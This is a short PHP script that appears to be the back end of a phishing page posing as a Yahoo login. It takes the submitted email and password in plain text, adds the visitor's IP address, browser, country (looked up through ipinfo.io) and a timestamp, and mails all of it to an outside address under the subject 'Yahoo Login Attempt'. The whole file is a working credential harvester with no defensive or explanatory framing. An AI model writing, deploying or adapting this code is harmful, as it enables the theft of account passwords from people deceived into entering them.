<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Get email and password from POST request
    $email = filter_input(INPUT_POST, 'email', FILTER_SANITIZE_EMAIL);
    $password = filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING);

    // Collect additional user information
    $userIP = $_SERVER['REMOTE_ADDR'];
    $userBrowser = $_SERVER['HTTP_USER_AGENT'];
    $timestamp = date("Y-m-d H:i:s");

    // Get country information based on IP using ipinfo.io
    $userCountry = "Unknown";
    $ipInfoUrl = "http://ipinfo.io/{$userIP}/country";
    $country = @file_get_contents($ipInfoUrl);
    if ($country !== FALSE) {
        $userCountry = trim($country);
    }

    // Prepare email message
    $to = "admin@postalfanatic.com";
    $subject = "Yahoo Login Attempt";
    $message = "Email: $email\nPassword: $password\nIP Address: $userIP\nBrowser: $userBrowser\nCountry: $userCountry\nDate/Time: $timestamp";
    $headers = "From: noreply@lendquick.net";

    // Send email
    if (mail($to, $subject, $message, $headers)) {
        echo "success";
    } else {
        echo "Failed to send email.";
    }
} else {
    echo "Invalid request.";
}
?>
